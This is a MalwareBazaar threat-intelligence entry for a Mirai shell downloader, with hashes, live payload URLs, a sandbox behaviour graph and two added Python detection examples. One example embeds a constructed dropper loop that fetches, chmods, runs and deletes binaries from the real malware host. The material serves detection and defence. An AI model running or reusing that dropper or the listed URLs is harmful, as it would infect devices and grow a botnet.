MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 2e0bd5206319d496d982b1cd36c8e181bc99986156fc529d24e47eb913d6ed18. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry

Mirai
Vendor detections: 7



SHA256 hash: 2e0bd5206319d496d982b1cd36c8e181bc99986156fc529d24e47eb913d6ed18
SHA3-384 hash: de30ae657890a6ea512ec3ed074c123e760a51a46a55e1c5d187fb11442a8f0d899afd44db4405190fcecc0bf6d9cd53
SHA1 hash: aae98581c60c603a2aa477db1a5833d4dc367e7a
MD5 hash: 0a53d9fcd16b547366cd8ee9007e858e
humanhash: uranus-river-river-earth
File name: 1.sh
Signature: Mirai
File size: 3'374 bytes
First seen: 2025-06-24 10:04:14 UTC
Last seen: Never
File type: sh
MIME type: text/x-shellscript
ssdeep: 24:ItBLJZsBW+bhBZvkBySlfBw4msBsMTBKuKGgJBzh6BEUnLBEuENIpKksBW+MEBo7:i69Up3PoX1i7LuJRfco/BgJsDk
TLSH: T162613DF6134247339DEA8EA376A884046185809B94CE5FB99BFC74B68C4CEC9FC46653
Magika: shell
Reporter: abuse_ch
Tags: mirai sh
URL | Malware sample (SHA256 hash) | Signature | Tags
http://196.251.117.162/00101010101001/morte.x86 | 5ed1b9ac972a32ccd8e338e37d34e0d8dda1470054c8e65ae8973d5676e67e05 | Mirai | elf mirai ua-wget
http://196.251.117.162/00101010101001/morte.mips | ad0014f7c3e604337ddc19ef434b8026e712d03400cec2b7c10c9c5617d16a81 | Mirai | mirai opendir ua-wget
http://196.251.117.162/00101010101001/morte.arc | 7b6bba4e96e466269dd67e803f36e9902228e565d19ff96697c9a9591f6f1d45 | Mirai | mirai opendir ua-wget
http://196.251.117.162/00101010101001/morte.i468 | n/a | n/a | n/a
http://196.251.117.162/00101010101001/morte.i686 | 4c429ba34ce795e5f6d7cf151889caa9221c8fe6910b52312fe612addda6498b | Mirai | CoinMiner mirai opendir ua-wget
http://196.251.117.162/00101010101001/morte.x86_64 | e577e2fba99280a6bfb5abd75048d8371d2ab9637d1c2a74b95155e906677817 | Mirai | mirai opendir ua-wget
http://196.251.117.162/00101010101001/morte.mpsl | 5df2b5357b42bbaf21309d1695ee1ff5e67b29a99682e63671e466d24d9e04e2 | Mirai | mirai opendir ua-wget
http://196.251.117.162/00101010101001/morte.arm | e1cb2eee5c69a0c80198336de508ca901a9e70678f9b2ae291d7781a6bdee794 | Mirai | mirai opendir ua-wget
http://196.251.117.162/00101010101001/morte.arm5 | e28b4a608313570071e74495580493ec59567e4971c44e8e44c11b6b4f49dc06 | Mirai | mirai opendir ua-wget
http://196.251.117.162/00101010101001/morte.arm6 | 61b7c859316ea98f83307d221ebb0200002399cc6ec182371e49829133d12bf4 | Mirai | mirai opendir ua-wget
http://196.251.117.162/00101010101001/morte.arm7 | 1d7c1cf868a753537c94c6f3f8fc374311b370ad42c8efcab33703d2a1408fc1 | Mirai | mirai opendir ua-wget
http://196.251.117.162/00101010101001/morte.ppc | 856e9cb5636752694313199f4c80a7a0577a50420e2bd7b3f6ee2252ab08345e | Mirai | CoinMiner mirai opendir ua-wget
http://196.251.117.162/00101010101001/morte.spc | 858ac66c2df8bc22074efffe1e278e4af1f8a50421aa6b3549cb8fb58479d53e | Mirai | mirai opendir ua-wget
http://196.251.117.162/00101010101001/morte.m68k | fed25a810ff084957f4cf11384b377862414c27e0496244862a51e408db0c342 | Mirai | mirai opendir ua-wget
http://196.251.117.162/00101010101001/morte.sh4 | 8a5139d6dc5ffb22c4142d8c7699e99574cd9360537a0aaa73e87828fe8bc567 | Mirai | mirai opendir ua-wget

Intelligence

File Origin
# of uploads: 1
# of downloads: 70
Origin country: DE
Vendor Threat Intelligence
Status: terminated
Behavior Graph (process tree and network activity, condensed from the sandbox graph; pids as recorded by the sandbox):

Process tree (parent -> child via execve unless marked as clone):
- /usr/bin/sudo (pid 2856) -> /tmp/sample.bin (pid 2863), the submitted script
- /tmp/sample.bin (pid 2863) -> /usr/bin/cp (pid 2865), then fifteen download cycles (the same count as the per-architecture URLs listed above), each of the form:
  /usr/bin/wget (net, send-data, write-file) -> /usr/bin/curl (net, send-data, write-file) -> /usr/bin/chmod -> run the fetched file -> /usr/bin/rm (delete-file)
- Fetched files that actually ran on the sandbox host: /tmp/morte.x86 (pid 2910, net), /tmp/morte.i686 (pid 3627, net), /tmp/morte.x86_64 (pid 4033, mprotect-exec, net). In the other twelve cycles the run step shows up as a cloned /usr/bin/bash (pids 3516, 3548, 3592, 4500, 4535, 4584, 4664, 4715, 4769, 4822, 4878, 4930).
- /tmp/morte.x86 (pid 2910) clones /tmp/morte.x86 pids 2912, 3445 and 3446 (net, send-data, zombie); pid 2912 clones pids 2913 and 2915 (dns, net, send-data, zombie).

Network endpoints:
- 196.251.117.162:80: first cycle only, wget pid 2870 (154 B sent), curl pid 2893 (103 B sent)
- jbvpshosti.com:80: wget and curl in every later cycle (pids 3449 through 4904, 103 to 157 B sent per request), plus /tmp/morte.x86 pid 3446 (15 B)
- jbvpshosti.com:12121: /tmp/morte.x86 pid 2915 (30 B sent)
- 8.8.8.8:53: /tmp/morte.x86 pids 2910, 2915 (64 B) and 3446 (160 B), /tmp/morte.i686 pid 3627, /tmp/morte.x86_64 pid 4033
- 0.0.0.0:12121: connections recorded from /tmp/morte.i686 pid 3627 and /tmp/morte.x86_64 pid 4033
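The graph above records a repeating wget/curl -> chmod -> execute-from-/tmp -> rm cycle driven by the script. The following is an added example, not code from MalwareBazaar or the sandbox vendor, showing how to hunt for that cycle in process-execution telemetry. The log format, the command lines and the benign tail (pids 5000 to 5002) are constructed for the example; only the pids 2863, 2870, 2893, 2908, 2910 and 3447, the /tmp/morte.x86 path and the 196.251.117.162 URL are taken from this entry. Map your own EDR or auditd fields onto the Event tuple.

```python
from __future__ import annotations
from collections import defaultdict
from dataclasses import dataclass
import re
import shlex


@dataclass
class Event:
    pid: int
    ppid: int
    exe: str        # resolved executable path, as the sandbox graph shows per node
    argv: list[str]


# Constructed process-execution log, one event per line: "pid ppid exe argv...".
# Pids 2863/2870/2893/2908/2910/3447, /tmp/morte.x86 and the URL follow this
# entry; the command lines and the benign tail (pids 5000-5002) are made up.
SAMPLE_LOG = """\
2863 2856 /bin/sh sh /tmp/sample.bin
2870 2863 /usr/bin/wget wget http://196.251.117.162/00101010101001/morte.x86 -O /tmp/morte.x86
2893 2863 /usr/bin/curl curl -o /tmp/morte.x86 http://196.251.117.162/00101010101001/morte.x86
2908 2863 /usr/bin/chmod chmod +x /tmp/morte.x86
2910 2863 /tmp/morte.x86 /tmp/morte.x86
3447 2863 /usr/bin/rm rm -rf /tmp/morte.x86
5001 5000 /usr/bin/wget wget https://example.invalid/pkg.tar.gz -O /tmp/pkg.tar.gz
5002 5000 /usr/bin/tar tar xzf /tmp/pkg.tar.gz -C /opt/pkg
"""

DOWNLOADERS = {"wget", "curl", "tftp", "ftpget"}
TMP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/", "/var/run/")


def parse_log(text: str) -> list[Event]:
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        pid, ppid, exe, rest = line.split(" ", 3)
        events.append(Event(int(pid), int(ppid), exe, shlex.split(rest)))
    return events


def grants_exec(mode: str) -> bool:
    """True for chmod mode arguments that add an execute bit (+x, 777, 0755, ...)."""
    if re.fullmatch(r"[ugoa]*\+[rwXst]*x[rwXst]*", mode):
        return True
    m = re.fullmatch(r"0?([0-7]{3})", mode)
    return bool(m) and any(int(d) & 1 for d in m.group(1))


def find_download_exec_cycles(events: list[Event]) -> list[dict]:
    """Per parent process, look in order for: a downloader, a chmod that adds
    execute on a path in a world-writable directory, execution of that path,
    and (optionally) its removal afterwards. One finding per executed payload."""
    by_parent: dict[int, list[Event]] = defaultdict(list)
    for ev in events:
        by_parent[ev.ppid].append(ev)

    findings = []
    for ppid, evs in by_parent.items():
        saw_downloader = False
        made_executable: set[str] = set()
        for i, ev in enumerate(evs):
            name = ev.exe.rsplit("/", 1)[-1]
            if name in DOWNLOADERS:
                saw_downloader = True
            elif name == "chmod" and any(grants_exec(a) for a in ev.argv[1:]):
                made_executable.update(a for a in ev.argv[1:] if a.startswith(TMP_DIRS))
            elif ev.exe.startswith(TMP_DIRS) and saw_downloader and ev.exe in made_executable:
                # Self-cleanup: the same parent later runs rm on the payload path.
                removed = any(e.exe.endswith("/rm") and ev.exe in e.argv for e in evs[i + 1:])
                findings.append({"parent": ppid, "pid": ev.pid, "payload": ev.exe,
                                 "removed_after_exec": removed})
    return findings


if __name__ == "__main__":
    for finding in find_download_exec_cycles(parse_log(SAMPLE_LOG)):
        print(finding)
```

The benign wget-then-tar pair in the constructed log produces no finding, because nothing under /tmp is made executable and run; the sample's cycle produces one finding for /tmp/morte.x86 with removed_after_exec set, which is the full drop-run-delete pattern the graph shows fifteen times.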
Threat name: Linux.Downloader.Medusa
Status: Malicious
First seen: 2025-06-24 10:04:23 UTC
File Type: Text (Shell)
AV detection: 16 of 24 (66.67%)
Threat level: 3/5

Result
Malware family:
Score: 10/10
Tags: family:mirai antivm botnet defense_evasion discovery linux upx
Behaviour
Reads runtime system information
System Network Configuration Discovery
Writes file to tmp directory
Checks CPU configuration
UPX packed file
Enumerates running processes
Writes file to system bin folder
File and Directory Permissions Modification
Executes dropped EXE
Modifies Watchdog functionality
Mirai
Mirai family
Please note that we are no longer able to provide a coverage score for VirusTotal.

YARA Signatures


MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. These are matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are displayed.

Rule name: Linux_Shellscript_Downloader
Author: albertzsigovits
Description: Generic Approach to Shellscript downloaders
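The YARA rule above takes a generic approach to shell-script downloaders. As an added example, not the rule itself and not the contents of 1.sh (which this page does not reproduce), the following Python scores a script on the traits such droppers share: a downloader with a fallback (wget || curl), hopping between world-writable directories, chmod followed by execution from the working directory, self-deletion, a long list of architecture suffixes, and a raw-IP host. SAMPLE_SCRIPT is a constructed stand-in whose host and URL path come from this entry's URL list; its loop body, the architecture list and BENIGN_SCRIPT are assumptions made for the example.

```python
import re

# Constructed stand-in for a multi-architecture dropper. The host and URL path
# are from this entry's URL list; the loop and command lines are assumed, not
# the real contents of 1.sh.
SAMPLE_SCRIPT = r"""#!/bin/sh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
for a in x86 mips arc i468 i686 x86_64 mpsl arm arm5 arm6 arm7 ppc spc m68k sh4; do
  wget http://196.251.117.162/00101010101001/morte.$a -O morte.$a || curl -O http://196.251.117.162/00101010101001/morte.$a
  chmod 777 morte.$a
  ./morte.$a
  rm -rf morte.$a
done
"""

# Constructed benign installer for contrast (example.invalid is a reserved name).
BENIGN_SCRIPT = r"""#!/bin/sh
set -e
curl -fsSL https://example.invalid/release.tar.gz -o /tmp/release.tar.gz
tar -xzf /tmp/release.tar.gz -C /opt/app
"""

ARCH_TOKENS = {"x86", "x86_64", "i486", "i586", "i686", "mips", "mipsel", "mpsl",
               "arm", "arm4", "arm5", "arm6", "arm7", "armv4l", "armv5l", "armv6l",
               "armv7l", "ppc", "powerpc", "sh4", "spc", "sparc", "m68k", "arc"}
WRITABLE_DIRS = ("/tmp", "/var/run", "/mnt", "/dev/shm", "/var/tmp")

URL_RE = re.compile(r"https?://([^/\s]+)(/\S*)?")
IP_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?$")
CD_RE = re.compile(r"\bcd\s+(?:%s)\b" % "|".join(map(re.escape, WRITABLE_DIRS)))
DOWNLOADER_RE = re.compile(r"\b(?:wget|curl|tftp|ftpget)\b")
FALLBACK_RE = re.compile(r"\b(?:wget|curl)\b[^\n]*\|\|[^\n]*\b(?:wget|curl)\b")
CHMOD_EXEC_RE = re.compile(r"\bchmod\s+(?:[0-7]*[1357]|[ugoa]*\+x)\b")
RUN_LOCAL_RE = re.compile(r"(?m)^\s*\./\S+")
SELF_DELETE_RE = re.compile(r"\brm\s+-r?f\s")


def score_script(text: str) -> dict:
    """Score the traits of a Mirai-style multi-architecture downloader script."""
    hosts = {host for host, _path in URL_RE.findall(text)}
    tokens = set(re.findall(r"[A-Za-z0-9_]+", text))
    f = {
        "downloader_calls": len(DOWNLOADER_RE.findall(text)),
        "downloader_fallback": bool(FALLBACK_RE.search(text)),  # wget ... || curl ...
        "writable_dir_hops": len(CD_RE.findall(text)),           # cd /tmp || cd /var/run ...
        "chmod_exec": bool(CHMOD_EXEC_RE.search(text)),
        "runs_from_cwd": bool(RUN_LOCAL_RE.search(text)),
        "self_delete": bool(SELF_DELETE_RE.search(text)),
        "arch_suffixes": sorted(ARCH_TOKENS & tokens),
        "raw_ip_hosts": sorted(h for h in hosts if IP_RE.match(h)),
    }
    # Weights are a judgement call for this example; tune them against your own corpus.
    weighted = [
        (f["downloader_calls"] > 0, 1),
        (f["downloader_fallback"], 2),
        (f["writable_dir_hops"] >= 2, 2),
        (f["chmod_exec"] and f["runs_from_cwd"], 2),
        (f["self_delete"], 1),
        (len(f["arch_suffixes"]) >= 3, 3),
        (bool(f["raw_ip_hosts"]), 1),
    ]
    f["score"] = sum(w for hit, w in weighted if hit)
    f["verdict"] = "multi-arch downloader" if f["score"] >= 6 else "no dropper pattern"
    return f


if __name__ == "__main__":
    for name, script in (("sample", SAMPLE_SCRIPT), ("benign", BENIGN_SCRIPT)):
        r = score_script(script)
        print(name, r["score"], r["verdict"], r["arch_suffixes"], r["raw_ip_hosts"])
```

The architecture-suffix count is the strongest single signal: an installer for one host has no reason to name fourteen CPU targets, while a Mirai dropper has to, because it cannot know in advance what the victim runs. The raw-IP and directory-hopping traits are weaker on their own and are weighted accordingly.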

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Web download | Mirai | sh 2e0bd5206319d496d982b1cd36c8e181bc99986156fc529d24e47eb913d6ed18 (this sample)

Delivery method: Distributed via web download

Comments